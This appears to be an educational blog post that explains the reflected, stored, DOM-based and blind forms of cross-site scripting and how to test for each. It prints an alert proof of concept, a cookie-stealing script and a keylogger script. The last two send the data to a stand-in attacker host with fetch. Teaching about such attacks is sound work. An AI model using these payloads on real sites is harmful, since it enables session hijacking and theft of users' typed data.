Cross-site Scripting

How to Detect and Exploit XSS Vulnerabilities

Examples of XSS Intentions

Proof of Concept

This is the most basic type of payload, and all you want to accomplish is show that you can XSS a webpage. This is generally achieved by causing an alert box to appear on the page with random text, such as:

<script>
alert('Yaj, XSS the webpage!');
</script>

Session Stealing

Cookies on the computers of targets are commonly used to store information about a user’s session, such as login tokens. The following code utilizes a JavaScript function to steal the victim’s cookie, base64-encode it for transmission, and then post it to a website controlled by the hacker. The cookies may be used by hackers to take control of the target’s session and be recorded as that person.

<script>
fetch('https://hackerwebpage.com/steal?cookie='+btoa(document.cookie));
</script>

Key Logger

The following script is a key logger. This means anything you type on the website will be sent to a website under the hacker’s control. If the site where the payload was delivered accepted user registrations or credit card information, this might be quite dangerous.

<script>
document.onkeypress = function(e) { fetch('https://hackerwebpage.com/log?key=' + btoa(e.key) );}
</script>

Reflected XSS

When user-supplied data is included in the source of an HTTP request without any validation, it becomes possible for a reflected XSS vulnerability to occur.

Potential Impact

The attacker may post links or embed them in an iframe on a different website to potential victims, enticing them to execute code on their browser, potentially leaking session or consumer data.

Test for Reflected XSS

Every conceivable entrance should be tested; these include:

  • Parameters in the URL Query String
  • URL File Path
  • Sometimes HTTP Headers

Stored XSS

The XSS payload is saved on the web application (in a database, for example) and then run when other people visit the site or page.

Potential Impact

The attacker’s malicious JavaScript might redirect users to another site, capture the user’s session cookie, or execute other website operations while posing as a visitor.

Test for Stored XSS

You’ll need to test every conceivable entry point where data is believed to be stored and then presented back in areas that other users have access to.

DOM Based XSS

What is the DOM?

The Document Object Model (DOM) is a programming interface for HTML and XML documents. It functions as a proxy for the document, allowing applications to modify the document’s structure, style, and content. A web page is a document, and it can be viewed in the browser window or as an HTML source file.

Exploit the DOM

JavaScript is executed inside the client-side web browser within the DOM. This refers to attacks that target websites where the data isn’t being transmitted or submitted to a backend server.

Potential Impact

The malicious code may be used to capture information from the user’s session and redirect them to another website or steal content from the page or their session.

Test for DOM Based XSS

DOM Based XSS is difficult to test for and needs a thorough understanding of JavaScript to comprehend the source code. You’d need to search for bits of user-supplied input in the DOM (Document Object Model) and then inject your code.

Blind XSS

Blind XSS is similar to stored XSS in that your payload is saved on the site for another user to view, but you can’t see the payload working or test it against yourself.

Potential Impact

The attacker’s JavaScript may call back to the attacker’s website, revealing the portal URL, cookies, and even what is being viewed on the portal page. Now the hacker has access to a staff member’s session and has access to their personal portal.

Test for Blind XSS

A call back is required for testing for Blind XSS attacks. This way, you can determine if and when your code is run.

Conclusion

In conclusion, XSS vulnerabilities are usually the biggest risk when it comes to web applications and websites, because of their potentially disastrous effects on the target’s computer. The best way to protect against these attacks is by using proper input validation on all user-supplied data, and always being on the lookout for regular expression exploits.

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store